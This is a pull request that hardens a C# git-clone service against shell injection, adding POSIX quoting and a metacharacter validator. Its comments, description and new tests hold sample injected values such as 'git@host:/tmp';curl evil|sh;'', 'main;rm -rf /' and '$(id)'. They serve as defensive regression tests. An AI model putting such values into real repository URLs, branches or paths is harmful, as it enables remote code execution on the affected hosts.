### PR TITLE
[CRITICAL] Reject shell metacharacters in git URL/branch/path; POSIX-quote clone args (#122)

### DIFF
--- a/src/Andy.Containers.Api/Services/GitCloneService.cs
+++ b/src/Andy.Containers.Api/Services/GitCloneService.cs
@@ -76,7 +76,7 @@ public class GitCloneService : IGitCloneService
             var container = await _db.Containers.FindAsync([containerId], ct)
                 ?? throw new KeyNotFoundException($"Container {containerId} not found");
 
-            var pullCommand = $"cd {repo.TargetPath} && git pull";
+            var pullCommand = $"cd {ShellQuote(repo.TargetPath)} && git pull";
 
             using var timeoutCts = CancellationTokenSource.CreateLinkedTokenSource(ct);
             timeoutCts.CancelAfter(CloneTimeout);
@@ -165,20 +165,32 @@ public class GitCloneService : IGitCloneService
                 cloneUrl = $"https://{Uri.EscapeDataString(token)}@{uri.Host}{uri.PathAndQuery}";
             }
 
-            // Build clone command
-            var cloneArgs = new List<string> { "git clone" };
+            // Build clone command. The command is exec'd through `sh -c` inside
+            // the container, so every dynamic value must be POSIX-quoted (and
+            // GitRepositoryValidator already rejects shell metacharacters in
+            // url / branch / target-path as a defense-in-depth gate).
+            var cloneArgs = new List<string> { "git", "clone" };
 
             if (repo.CloneDepth.HasValue)
-                cloneArgs.Add($"--depth {repo.CloneDepth.Value}");
+            {
+                cloneArgs.Add("--depth");
+                cloneArgs.Add(repo.CloneDepth.Value.ToString());
+            }
 
             if (!string.IsNullOrEmpty(repo.Branch))
-                cloneArgs.Add($"--branch {repo.Branch}");
+            {
+                cloneArgs.Add("--branch");
+                cloneArgs.Add(ShellQuote(repo.Branch));
+            }
 
             if (repo.Submodules)
                 cloneArgs.Add("--recurse-submodules");
 
-            cloneArgs.Add($"'{cloneUrl}'");
-            cloneArgs.Add($"'{repo.TargetPath}'");
+            // `--` ends git's option parsing so a URL starting with `-` cannot
+            // be re-interpreted as a flag.
+            cloneArgs.Add("--");
+            cloneArgs.Add(ShellQuote(cloneUrl));
+            cloneArgs.Add(ShellQuote(repo.TargetPath));
 
             var command = string.Join(" ", cloneArgs);
 
@@ -316,5 +328,16 @@ public class GitCloneService : IGitCloneService
             _logger.LogDebug(ex, "Failed to collect clone metadata for {TargetPath}", targetPath);
             return null;
         }
+    }
+
+    /// <summary>
+    /// POSIX-safe shell quoting: wrap in single quotes and escape any embedded
+    /// single quotes via the standard `'\''` dance. Defense-in-depth — values
+    /// passed here are already filtered by GitRepositoryValidator.
+    /// </summary>
+    internal static string ShellQuote(string value)
+    {
+        if (value is null) return "''";
+        return "'" + value.Replace("'", "'\\''") + "'";
     }
 }

--- a/src/Andy.Containers.Api/Services/GitRepositoryValidator.cs
+++ b/src/Andy.Containers.Api/Services/GitRepositoryValidator.cs
@@ -5,7 +5,15 @@ namespace Andy.Containers.Api.Services;
 
 public static partial class GitRepositoryValidator
 {
+    // Metacharacters that have meaning in /bin/sh. We reject these in URLs,
+    // branches, and target paths so they cannot escape from any quoting we apply
+    // before passing the value into `sh -c`.
+    private static readonly Regex ShellMetaChars = ShellMetaCharsRegex();
     private static readonly Regex InvalidBranchChars = InvalidBranchCharsRegex();
+
+    private const int MaxUrlLength = 2048;
+    private const int MaxBranchLength = 256;
+    private const int MaxTargetPathLength = 1024;
 
     public static List<string> Validate(GitRepositoryConfig config)
     {
@@ -17,6 +25,12 @@ public static partial class GitRepositoryValidator
             return errors;
         }
 
+        if (config.Url.Length > MaxUrlLength)
+        {
+            errors.Add($"Repository URL exceeds maximum length of {MaxUrlLength} characters");
+            return errors;
+        }
+
         // Check URL scheme
         if (!config.Url.StartsWith("https://", StringComparison.OrdinalIgnoreCase) &&
             !config.Url.StartsWith("git@", StringComparison.OrdinalIgnoreCase))
@@ -24,37 +38,66 @@ public static partial class GitRepositoryValidator
             errors.Add("Only https:// and git@ URL schemes are allowed");
         }
 
+        // Reject shell metacharacters anywhere in the URL. The clone is exec'd
+        // through `sh -c`, so a URL like `git@host:/tmp';curl evil|sh;'` would
+        // otherwise inject arbitrary shell.
+        if (ShellMetaChars.IsMatch(config.Url))
+        {
+            errors.Add("Repository URL contains characters that are not allowed");
+        }
+
         // Reject embedded credentials in URL
         if (config.Url.StartsWith("https://", StringComparison.OrdinalIgnoreCase))
         {
-            var uri = new Uri(config.Url);
-            if (!string.IsNullOrEmpty(uri.UserInfo))
+            try
             {
-                errors.Add("Embedded credentials in URLs are not allowed. Use a credential reference instead");
+                var uri = new Uri(config.Url);
+                if (!string.IsNullOrEmpty(uri.UserInfo))
+                {
+                    errors.Add("Embedded credentials in URLs are not allowed. Use a credential reference instead");
+                }
+            }
+            catch (UriFormatException)
+            {
+                errors.Add("Repository URL is not a valid URI");
             }
         }
 
-        // Validate target path (no path traversal)
+        // Validate target path (no path traversal, no shell metacharacters)
         if (!string.IsNullOrEmpty(config.TargetPath))
         {
-            var normalized = config.TargetPath.Replace('\\', '/');
-            if (normalized.Contains("..") ||
-                normalized.Contains("~") ||
-                (!normalized.StartsWith('/') && !normalized.StartsWith("./")))
+            if (config.TargetPath.Length > MaxTargetPathLength)
             {
-                errors.Add("Target path must be absolute and cannot contain path traversal sequences");
+                errors.Add($"Target path exceeds maximum length of {MaxTargetPathLength} characters");
+            }
+            else
+            {
+                var normalized = config.TargetPath.Replace('\\', '/');
+                if (normalized.Contains("..") ||
+                    normalized.Contains("~") ||
+                    (!normalized.StartsWith('/') && !normalized.StartsWith("./")))
+                {
+                    errors.Add("Target path must be absolute and cannot contain path traversal sequences");
+                }
+                if (ShellMetaChars.IsMatch(config.TargetPath))
+                {
+                    errors.Add("Target path contains characters that are not allowed");
+                }
             }
         }
 
-        // Validate branch name
+        // Validate branch name (git check-ref-format-style) and reject shell metacharacters
         if (!string.IsNullOrEmpty(config.Branch))
         {
-            if (config.Branch.Contains("..") ||
+            if (config.Branch.Length > MaxBranchLength ||
+                config.Branch.Contains("..") ||
                 config.Branch.Contains(" ") ||
                 config.Branch.EndsWith('.') ||
                 config.Branch.EndsWith('/') ||
+                config.Branch.StartsWith('-') ||
                 config.Branch.Contains("\\") ||
-                InvalidBranchChars.IsMatch(config.Branch))
+                InvalidBranchChars.IsMatch(config.Branch) ||
+                ShellMetaChars.IsMatch(config.Branch))
             {
                 errors.Add("Invalid branch name");
             }
@@ -81,4 +124,9 @@ public static partial class GitRepositoryValidator
 
     [GeneratedRegex(@"[\x00-\x1f\x7f~^:?*\[\\]")]
     private static partial Regex InvalidBranchCharsRegex();
+
+    // Shell metacharacters: command separators, pipes, redirections, quotes,
+    // expansions, escapes, globs, brace expansion, and whitespace.
+    [GeneratedRegex(@"[;&|`$<>()\{\}\[\]\\""'\n\r\t *?!]")]
+    private static partial Regex ShellMetaCharsRegex();
 }

--- a/tests/Andy.Containers.Api.Tests/Services/GitCloneServiceTests.cs
+++ b/tests/Andy.Containers.Api.Tests/Services/GitCloneServiceTests.cs
@@ -362,7 +362,8 @@ public class GitCloneServiceTests : IDisposable
 
         await _service.CloneRepositoryAsync(container.Id, repo.Id);
 
-        cloneCommand.Should().Contain("--branch develop");
+        // Branch is POSIX-quoted (defense-in-depth — also rejected by validator)
+        cloneCommand.Should().Contain("--branch 'develop'");
     }
 
     [Fact]
@@ -532,7 +533,7 @@ public class GitCloneServiceTests : IDisposable
 
         await _service.PullRepositoryAsync(container.Id, repo.Id);
 
-        pullCommand.Should().Be("cd /home/dev/myproject && git pull");
+        pullCommand.Should().Be("cd '/home/dev/myproject' && git pull");
     }
 
     [Fact]

--- a/tests/Andy.Containers.Tests/GitRepositoryValidatorTests.cs
+++ b/tests/Andy.Containers.Tests/GitRepositoryValidatorTests.cs
@@ -148,7 +148,9 @@ public class GitRepositoryValidatorTests
             TargetPath = "/workspace\\..\\..\\etc"
         };
         var errors = GitRepositoryValidator.Validate(config);
-        errors.Should().ContainSingle().Which.Should().Contain("path traversal");
+        // Backslash is both a path-traversal hint and a shell metacharacter, so
+        // both rules fire. Either is sufficient to block the request.
+        errors.Should().Contain(e => e.Contains("path traversal"));
     }
 
     [Fact]
@@ -240,6 +242,63 @@ public class GitRepositoryValidatorTests
         errors.Should().HaveCount(2);
         errors[0].Should().StartWith("Repository [1]:");
         errors[1].Should().StartWith("Repository [2]:");
+    }
+
+    [Theory]
+    [InlineData("https://github.com/owner/repo.git;curl evil")]
+    [InlineData("https://github.com/owner/repo.git`id`")]
+    [InlineData("https://github.com/owner/repo.git$(id)")]
+    [InlineData("https://github.com/owner/repo.git|sh")]
+    [InlineData("https://github.com/owner/repo.git&whoami")]
+    [InlineData("git@host:/tmp';curl evil|sh;'")]
+    public void Validate_UrlWithShellMetacharacters_ShouldBeRejected(string maliciousUrl)
+    {
+        var config = new GitRepositoryConfig { Url = maliciousUrl };
+        var errors = GitRepositoryValidator.Validate(config);
+        errors.Should().Contain(e => e.Contains("not allowed"));
+    }
+
+    [Theory]
+    [InlineData("main;rm -rf /")]
+    [InlineData("main$(id)")]
+    [InlineData("main`id`")]
+    [InlineData("main|sh")]
+    [InlineData("-uupload-pack=foo")]
+    public void Validate_BranchWithShellMetacharactersOrLeadingDash_ShouldBeRejected(string maliciousBranch)
+    {
+        var config = new GitRepositoryConfig
+        {
+            Url = "https://github.com/owner/repo.git",
+            Branch = maliciousBranch
+        };
+        var errors = GitRepositoryValidator.Validate(config);
+        errors.Should().Contain(e => e.Contains("Invalid branch"));
+    }
+
+    [Theory]
+    [InlineData("/workspace/repo;rm -rf /")]
+    [InlineData("/workspace/$(id)")]
+    [InlineData("/workspace/`whoami`")]
+    public void Validate_TargetPathWithShellMetacharacters_ShouldBeRejected(string maliciousPath)
+    {
+        var config = new GitRepositoryConfig
+        {
+            Url = "https://github.com/owner/repo.git",
+            TargetPath = maliciousPath
+        };
+        var errors = GitRepositoryValidator.Validate(config);
+        errors.Should().Contain(e => e.Contains("not allowed"));
+    }
+
+    [Fact]
+    public void Validate_UrlExceedingMaxLength_ShouldBeRejected()
+    {
+        var config = new GitRepositoryConfig
+        {
+            Url = "https://github.com/" + new string('a', 3000) + "/repo.git"
+        };
+        var errors = GitRepositoryValidator.Validate(config);
+        errors.Should().Contain(e => e.Contains("maximum length"));
     }
 
     [Fact]


### PR DESCRIPTION
Closes #122.

## Summary

`GitCloneService` builds a clone command and runs it through `sh -c` inside the container (`DockerInfrastructureProvider.ExecAsync` wraps the string in `[\"sh\", \"-c\", command]`). The command was assembled by string-concatenating user-supplied `repo.Url` / `repo.Branch` / `repo.TargetPath`, with only single-quote wrapping on the URL/path and no quoting on the branch. `GitRepositoryValidator` only checked the URL scheme — so a crafted URL like

\`\`\`
git@host:/tmp';curl evil|sh;'
\`\`\`

would close the wrapping quote and run arbitrary shell inside the container, which has full network egress and `NOPASSWD` sudo — yielding RCE-as-root.

Defense-in-depth at two layers:

- **`GitRepositoryValidator`** now rejects shell metacharacters anywhere in the URL, branch, or target path. Branch rules also reject a leading `-` (so a branch can't be re-interpreted as a git option). Length caps added on URL / branch / target-path.
- **`GitCloneService`** quotes every dynamic value with a POSIX-safe single-quote escape (`'\\''` for embedded quotes) and emits `--` before the URL so a URL starting with `-` cannot be re-interpreted as a flag. The pull path quotes `repo.TargetPath` too.

## Test plan

- [x] `dotnet build` clean
- [x] `dotnet test tests/Andy.Containers.Api.Tests` — 574/574 pass (assertion updates for quoted output)
- [x] `dotnet test tests/Andy.Containers.Tests` — 305/305 pass (12 new validator regression tests for shell-meta URLs / branches / paths and length cap)
- [ ] Smoke: clone a normal `https://github.com/owner/repo` URL with branch `main` — still works
- [ ] Smoke: submit a URL containing `;` / `\$(...)` / `` ` `` / `|` — rejected at the API surface with a clear error

## Notes

The container exec path remains `sh -c` because `IContainerService.ExecAsync` only takes a single command string today. Switching to argv-based exec is a larger interface change and is left as a follow-up.

🤖 Generated with [Claude Code](https://claude.com/claude-code)